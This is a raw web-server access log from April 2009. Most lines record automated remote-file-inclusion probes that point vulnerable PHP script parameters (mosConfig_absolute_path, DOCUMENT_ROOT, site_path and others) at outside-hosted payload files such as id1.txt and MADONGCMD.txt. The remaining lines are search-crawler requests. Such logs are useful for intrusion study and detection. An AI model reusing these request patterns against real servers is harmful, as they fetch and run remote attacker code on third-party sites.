119.147.24.160 - - [10/Apr/2009:02:51:37 -0500] "GET /logs/access_log.1236902400///s_loadenv.inc.php?DOCUMENT_ROOT=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
119.147.24.160 - - [10/Apr/2009:02:51:44 -0500] "GET /logs/access_log.1236729600///s_loadenv.inc.php?DOCUMENT_ROOT=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
83.137.192.223 - - [10/Apr/2009:03:06:26 -0500] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://forum-plongee.com/icon/1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
83.137.192.223 - - [10/Apr/2009:03:06:26 -0500] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://forum-plongee.com/icon/1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
83.137.192.223 - - [10/Apr/2009:03:06:26 -0500] "GET /logs/access_log.1230249600//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://forum-plongee.com/icon/1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
89.186.1.54 - - [10/Apr/2009:03:08:25 -0500] "GET /logs//modules/vwar/convert/mvcw_conver.php?vwar_root=http://www.pupapa.com/shop/images/fix/spider.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.800"
89.186.1.54 - - [10/Apr/2009:03:08:25 -0500] "GET //modules/vwar/convert/mvcw_conver.php?vwar_root=http://www.pupapa.com/shop/images/fix/spider.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.800"
65.55.230.165 - - [10/Apr/2009:03:09:44 -0500] "GET /logs/access_log.1201219200 HTTP/1.1" 200 697 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [10/Apr/2009:03:13:46 -0500] "GET /logs/access_log.1166313600 HTTP/1.1" 200 1012 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
72.36.149.90 - - [10/Apr/2009:03:14:15 -0500] "GET /logs/errors.php?error=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
72.36.149.90 - - [10/Apr/2009:03:14:15 -0500] "GET /errors.php?error=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
72.36.149.90 - - [10/Apr/2009:03:14:15 -0500] "GET /logs/access_log.1237248000/errors.php?error=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
125.251.161.165 - - [10/Apr/2009:03:21:12 -0500] "GET /logs/access_log.1230249600//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://forum-plongee.com/icon/1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
125.251.161.165 - - [10/Apr/2009:03:21:12 -0500] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://forum-plongee.com/icon/1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
125.251.161.165 - - [10/Apr/2009:03:21:12 -0500] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://forum-plongee.com/icon/1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
58.227.193.198 - - [10/Apr/2009:03:22:08 -0500] "GET //?_zb_path=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
58.227.193.198 - - [10/Apr/2009:03:22:08 -0500] "GET /logs/access_log.1235174400//?_zb_path=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
58.227.193.198 - - [10/Apr/2009:03:22:08 -0500] "GET /logs/access_log.1235520000//?_zb_path=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
58.227.193.198 - - [10/Apr/2009:03:22:14 -0500] "GET /logs//?_zb_path=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
65.55.208.130 - - [10/Apr/2009:03:22:33 -0500] "GET /logs/access_log.1229040000 HTTP/1.1" 200 26529 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
216.15.161.2 - - [10/Apr/2009:03:25:15 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
216.15.161.2 - - [10/Apr/2009:03:25:15 -0500] "GET /logs/access_log.1237852800//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
216.15.161.2 - - [10/Apr/2009:03:25:15 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
216.15.161.2 - - [10/Apr/2009:03:25:29 -0500] "GET /logs/access_log.1235520000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
88.191.89.65 - - [10/Apr/2009:03:26:14 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 348 "-""Mozilla/5.0"
88.191.89.65 - - [10/Apr/2009:03:26:14 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 353 "-""Mozilla/5.0"
88.191.89.65 - - [10/Apr/2009:03:26:14 -0500] "GET /logs/access_log.1230768000//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 375 "-""Mozilla/5.0"
88.191.89.65 - - [10/Apr/2009:03:26:18 -0500] "GET /logs/access_log.1232064000//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 375 "-""Mozilla/5.0"
58.227.193.198 - - [10/Apr/2009:03:33:43 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 348 "-""Mozilla/5.0"
58.227.193.198 - - [10/Apr/2009:03:33:43 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 353 "-""Mozilla/5.0"
58.227.193.198 - - [10/Apr/2009:03:33:43 -0500] "GET /logs/access_log.1230768000//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 375 "-""Mozilla/5.0"
58.227.193.198 - - [10/Apr/2009:03:34:05 -0500] "GET /logs/access_log.1232064000//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 375 "-""Mozilla/5.0"
123.214.171.107 - - [10/Apr/2009:03:43:11 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
123.214.171.107 - - [10/Apr/2009:03:43:11 -0500] "GET //include/admin.lib.inc.php?site_path=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
88.191.89.65 - - [10/Apr/2009:03:44:28 -0500] "GET /logs/access_log.1235174400//?_zb_path=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
88.191.89.65 - - [10/Apr/2009:03:44:28 -0500] "GET //?_zb_path=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
88.191.89.65 - - [10/Apr/2009:03:44:29 -0500] "GET /logs//?_zb_path=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 200 184997 "-""Mozilla/5.0"
88.191.89.65 - - [10/Apr/2009:03:44:33 -0500] "GET /logs/access_log.1235520000//?_zb_path=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
209.62.4.50 - - [10/Apr/2009:03:48:49 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.chodskypes.net/mambots/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
209.62.4.50 - - [10/Apr/2009:03:48:49 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.chodskypes.net/mambots/id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
209.62.4.50 - - [10/Apr/2009:03:48:49 -0500] "GET /logs/access_log.1236816000/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.chodskypes.net/mambots/id.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
74.94.66.42 - - [10/Apr/2009:03:54:23 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
74.94.66.42 - - [10/Apr/2009:03:54:23 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
74.94.66.42 - - [10/Apr/2009:03:54:23 -0500] "GET /logs/access_log.1234828800//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 382 "-""Mozilla/5.0"
74.94.66.42 - - [10/Apr/2009:03:54:43 -0500] "GET /logs/access_log.1234915200//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 382 "-""Mozilla/5.0"
211.43.205.222 - - [10/Apr/2009:03:56:10 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.bernardyni.ofm.pl/organy1/tmp/zero/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
211.43.205.222 - - [10/Apr/2009:03:56:10 -0500] "GET /logs/access_log.1237248000//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.bernardyni.ofm.pl/organy1/tmp/zero/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.43.205.222 - - [10/Apr/2009:03:56:10 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.bernardyni.ofm.pl/organy1/tmp/zero/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
69.72.219.234 - - [10/Apr/2009:03:57:20 -0500] "GET /logs/access_log.1237852800//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
69.72.219.234 - - [10/Apr/2009:03:57:20 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
69.72.219.234 - - [10/Apr/2009:03:57:21 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
69.72.219.234 - - [10/Apr/2009:03:58:15 -0500] "GET /logs/access_log.1235520000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
88.84.128.40 - - [10/Apr/2009:03:58:28 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
88.84.128.40 - - [10/Apr/2009:03:58:29 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
207.115.64.106 - - [10/Apr/2009:04:00:52 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
207.115.64.106 - - [10/Apr/2009:04:00:52 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
72.36.149.90 - - [10/Apr/2009:04:01:03 -0500] "GET /logs/access_log.1234828800//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 382 "-""Mozilla/5.0"
72.36.149.90 - - [10/Apr/2009:04:01:03 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
72.36.149.90 - - [10/Apr/2009:04:01:03 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
72.36.149.90 - - [10/Apr/2009:04:01:10 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
72.36.149.90 - - [10/Apr/2009:04:01:10 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
72.36.149.90 - - [10/Apr/2009:04:01:10 -0500] "GET /logs/access_log.1234828800//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 382 "-""Mozilla/5.0"
72.36.149.90 - - [10/Apr/2009:04:01:10 -0500] "GET /logs/access_log.1234915200//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 382 "-""Mozilla/5.0"
72.36.149.90 - - [10/Apr/2009:04:01:13 -0500] "GET /logs/access_log.1234915200//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 382 "-""Mozilla/5.0"
72.36.149.90 - - [10/Apr/2009:04:01:24 -0500] "GET /logs/access_log.1234828800//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 382 "-""Mozilla/5.0"
72.36.149.90 - - [10/Apr/2009:04:01:24 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
72.36.149.90 - - [10/Apr/2009:04:01:24 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
72.36.149.90 - - [10/Apr/2009:04:01:33 -0500] "GET /logs/access_log.1234915200//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 382 "-""Mozilla/5.0"
88.214.192.29 - - [10/Apr/2009:04:08:33 -0500] "GET /logs//include/write.php?dir=http://jamur.ucoz.com/id1.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
88.214.192.29 - - [10/Apr/2009:04:08:33 -0500] "GET /logs/access_log.1230422400//include/write.php?dir=http://jamur.ucoz.com/id1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
88.214.192.29 - - [10/Apr/2009:04:08:33 -0500] "GET //include/write.php?dir=http://jamur.ucoz.com/id1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
83.16.182.130 - - [10/Apr/2009:04:13:10 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.esoterikha.com/scgi-bin/boletim/header.jpg? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
83.16.182.130 - - [10/Apr/2009:04:13:10 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.esoterikha.com/scgi-bin/boletim/header.jpg? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
88.214.192.29 - - [10/Apr/2009:04:13:39 -0500] "GET /logs/access_log.1230422400//include/write.php?dir=http://jamur.ucoz.com/id1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
88.214.192.29 - - [10/Apr/2009:04:13:39 -0500] "GET /logs//include/write.php?dir=http://jamur.ucoz.com/id1.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
88.214.192.29 - - [10/Apr/2009:04:13:42 -0500] "GET //include/write.php?dir=http://jamur.ucoz.com/id1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:04:14:16 -0500] "GET /?DOCUMENT_ROOT=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:04:14:16 -0500] "GET /logs/access_log.1234310400/?DOCUMENT_ROOT=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:04:14:17 -0500] "GET /logs/access_log.1235779200/?DOCUMENT_ROOT=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:04:14:17 -0500] "GET /logs/access_log.1235865600/?DOCUMENT_ROOT=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:04:14:18 -0500] "GET /logs/?DOCUMENT_ROOT=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 200 184992 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:04:14:19 -0500] "GET /logs/access_log.1235260800/?DOCUMENT_ROOT=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:04:14:19 -0500] "GET /logs/access_log.1235347200/?DOCUMENT_ROOT=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:04:14:20 -0500] "GET /logs/access_log.1236556800/?DOCUMENT_ROOT=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:04:14:22 -0500] "GET /logs/access_log.1232150400/?DOCUMENT_ROOT=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:04:14:28 -0500] "GET /logs/access_log.1236038400/?DOCUMENT_ROOT=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:04:14:28 -0500] "GET /logs/access_log.1237420800/?DOCUMENT_ROOT=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:04:14:28 -0500] "GET /logs/access_log.1236384000/?DOCUMENT_ROOT=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:04:14:28 -0500] "GET /logs/access_log.1236211200/?DOCUMENT_ROOT=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:04:14:28 -0500] "GET /logs/access_log.1236470400/?DOCUMENT_ROOT=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:04:14:28 -0500] "GET /logs/access_log.1236297600/?DOCUMENT_ROOT=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
207.115.64.106 - - [10/Apr/2009:04:15:37 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
207.115.64.106 - - [10/Apr/2009:04:15:37 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.79"
207.115.64.106 - - [10/Apr/2009:04:15:59 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
207.115.64.106 - - [10/Apr/2009:04:15:59 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
88.84.128.40 - - [10/Apr/2009:04:16:05 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.803"
88.84.128.40 - - [10/Apr/2009:04:16:05 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
202.53.250.25 - - [10/Apr/2009:04:17:11 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
65.55.208.138 - - [10/Apr/2009:04:17:54 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.138 - - [10/Apr/2009:04:17:54 -0500] "GET /logs/access_log.1144713600 HTTP/1.1" 200 333 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.138 - - [10/Apr/2009:04:17:55 -0500] "GET /logs/access_log.1149465600 HTTP/1.1" 200 575 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.138 - - [10/Apr/2009:04:17:56 -0500] "GET /logs/access_log.1168560000 HTTP/1.1" 200 1012 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
207.115.64.106 - - [10/Apr/2009:04:17:59 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
207.115.64.106 - - [10/Apr/2009:04:17:59 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
65.55.208.138 - - [10/Apr/2009:04:18:03 -0500] "GET /logs/access_log.1153094400 HTTP/1.1" 200 783 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
88.84.128.40 - - [10/Apr/2009:04:18:24 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.803"
88.84.128.40 - - [10/Apr/2009:04:18:24 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
65.55.208.138 - - [10/Apr/2009:04:19:51 -0500] "GET /logs/access_log.1168387200 HTTP/1.1" 200 3494 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.138 - - [10/Apr/2009:04:19:51 -0500] "GET /logs/access_log.1119571200 HTTP/1.1" 200 938 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
202.53.250.25 - - [10/Apr/2009:04:20:32 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
202.53.250.25 - - [10/Apr/2009:04:20:38 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
88.84.128.40 - - [10/Apr/2009:04:21:13 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.803"
88.84.128.40 - - [10/Apr/2009:04:21:17 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.803"
202.53.250.25 - - [10/Apr/2009:04:23:57 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
65.55.208.142 - - [10/Apr/2009:04:26:17 -0500] "GET /logs/access_log.1137283200 HTTP/1.1" 200 2550 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.142 - - [10/Apr/2009:04:27:32 -0500] "GET /logs/access_log.1106697600 HTTP/1.1" 200 482 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.142 - - [10/Apr/2009:04:27:32 -0500] "GET /logs/access_log.1193011200 HTTP/1.1" 200 5804 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.142 - - [10/Apr/2009:04:27:32 -0500] "GET /logs/access_log.1139356800 HTTP/1.1" 200 260 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.142 - - [10/Apr/2009:04:27:32 -0500] "GET /logs/access_log.1165449600 HTTP/1.1" 200 656 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.142 - - [10/Apr/2009:04:27:32 -0500] "GET /logs/access_log.1200355200 HTTP/1.1" 200 1256 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
202.53.250.25 - - [10/Apr/2009:04:31:31 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
202.53.250.25 - - [10/Apr/2009:04:31:37 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
64.202.116.18 - - [10/Apr/2009:04:36:40 -0500] "GET ////?cmd&file=http://www.ccm.pl/ccm/test.txt?? HTTP/1.1" 200 3247 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.36.149.90 - - [10/Apr/2009:04:37:55 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
72.36.149.90 - - [10/Apr/2009:04:37:55 -0500] "GET /logs/access_log.1236816000/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
